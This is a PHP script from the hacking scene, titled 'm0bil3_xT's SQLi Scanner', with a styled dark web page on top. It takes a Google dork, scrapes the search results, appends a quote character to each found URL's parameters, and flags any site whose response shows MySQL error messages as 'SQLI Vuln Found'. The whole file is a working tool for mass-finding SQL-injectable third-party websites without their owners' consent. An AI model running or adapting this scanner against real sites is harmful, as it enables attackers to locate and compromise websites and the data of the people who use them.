m0bil3_xT's SQLi Scanner PHP

1. <php
2. <html>
3. <head>
4. <title>m0bil3_xT's SQLi Scanner</title>
5.  
6. <center><img src="http://i.imgur.com/lH3GO.png">
7. </center>
8.  
9. </head>
10. <body bgcolor=#000000>
11.  
12. <style>
13. body{
14. font: 10pt Verdana;
15. }
16. tr {
17. BORDER-RIGHT: #3e3e3e 1px solid;
18. BORDER-TOP: #3e3e3e 1px solid;
19. BORDER-LEFT: #3e3e3e 1px solid;
20. BORDER-BOTTOM: #3e3e3e 1px solid;
21. color: #ff9900;
22. }
23. td {
24. BORDER-RIGHT: #3e3e3e 1px solid;
25. BORDER-TOP: #3e3e3e 1px solid;
26. BORDER-LEFT: #3e3e3e 1px solid;
27. BORDER-BOTTOM: #3e3e3e 1px solid;
28. color: #2BA8EC;
29. font: 10pt Verdana;
30. }
31.  
32. table {
33. BORDER-RIGHT: #3e3e3e 1px solid;
34. BORDER-TOP: #3e3e3e 1px solid;
35. BORDER-LEFT: #3e3e3e 1px solid;
36. BORDER-BOTTOM: #3e3e3e 1px solid;
37. BACKGROUND-COLOR: #111;
38. }
39.  
40.  
41. input {
42. BORDER-RIGHT: #3e3e3e 1px solid;
43. BORDER-TOP: #3e3e3e 1px solid;
44. BORDER-LEFT: #3e3e3e 1px solid;
45. BORDER-BOTTOM: #3e3e3e 1px solid;
46. BACKGROUND-COLOR: Black;
47. font: 10pt Verdana;
48. color: #ff9900;
49. }
50.  
51. input.submit {
52. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
53. color: #FFFFFF;
54. border-color: #009900;
55. }
56.  
57. code {
58. border   : dashed 0px #333;
59. BACKGROUND-COLOR: Black;
60. font: 10pt Verdana bold;
61. color: while;
62. }
63.  
64. run {
65. border   : dashed 0px #333;
66. font: 10pt Verdana bold;
67. color: #FF00AA;
68. }
69.  
70. textarea {
71. BORDER-RIGHT: #3e3e3e 1px solid;
72. BORDER-TOP: #3e3e3e 1px solid;
73. BORDER-LEFT: #3e3e3e 1px solid;
74. BORDER-BOTTOM: #3e3e3e 1px solid;
75. BACKGROUND-COLOR: #1b1b1b;
76. font: Fixedsys bold;
77. color: #aaa;
78. }
79. A:link {
80. COLOR: #2BA8EC; TEXT-DECORATION: none
81. }
82. A:visited {
83. COLOR: #2BA8EC; TEXT-DECORATION: none
84. }
85. A:hover {
86. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
87. color: #ff9900; TEXT-DECORATION: none
88. }
89. A:active {
90. color: Red; TEXT-DECORATION: none
91. }
92.  
93. .listdir tr:hover{
94. background: #444;
95. }
96. .listdir tr:hover td{
97. background: #444;
98. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
99. color: #FFFFFF; TEXT-DECORATION: none;
100. }
101. .notline{
102. background: #111;
103. }
104. .line{
105. background: #222;
106. }
107. </style>
108.  
109. <center>
110. <br/>
111.  
112. <?php
113.  
114. echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
115.  
116. 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
117.  
118. rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
119.  
120. size='5'></font></b><br><br><center><a href='
121.  
122. target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
123.  
124. 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
125.  
126. font-weight:bold;' size='2'></font><br><br></center>";
127.  
128. $your_ip    = $_SERVER['REMOTE_ADDR'];
129. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
130.  
131. size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
132.  
133. font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
134.  
135. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
136. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
137.  
138. size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
139.  
140. font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
141.  
142. echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
143.  
144. value="" name="dork" size="20"/><input type="submit" name="scan"
145.  
146. value="Scan"></form></center>';
147.  
148. ob_start();
149. set_time_limit(0);
150.  
151. if (isset($_POST['scan'])) {
152.  
153. $browser = $_SERVER['HTTP_USER_AGENT'];
154.  
155. $first = "startgoogle.startpagina.nl/index.php?q=";
156. $sec = "&start=";
157. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
158.  
159. for($id=0 ; $id<=30; $id++){
160. $page=$id*10;
161. $dork=urlencode($_POST['dork']);
162. $url = $first.$dork.$sec.$page;
163.  
164. $curl = curl_init($url);
165. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
166. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
167. $result = curl_exec($curl);
168. curl_close($curl);
169.  
170. preg_match_all($reg,$result,$matches);
171.  
172. foreach($matches[1] as $site){
173.  
174. $url = preg_replace("/=/", "='", $site);
175. $curl=curl_init();
176. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
177. curl_setopt($curl,CURLOPT_URL,$url);
178. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
179. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
180. $GET=curl_exec($curl);
181. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
182.  
183. query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row
184.  
185. ()|SELECT *
186.  
187. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
188. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
189.  
190. target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
191.  
192. Found..</font></b></center>';
193. ob_flush();flush();
194. }else{
195. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
196.  
197. &#60;-- Not Vuln</font></center>';
198. ob_flush();flush();
199. }
200.  
201. ob_flush();flush();
202. }
203. ob_flush();flush();
204. }
205. ob_flush();flush();
206. }
207.  
208. ?>
209. </body>
210. </html>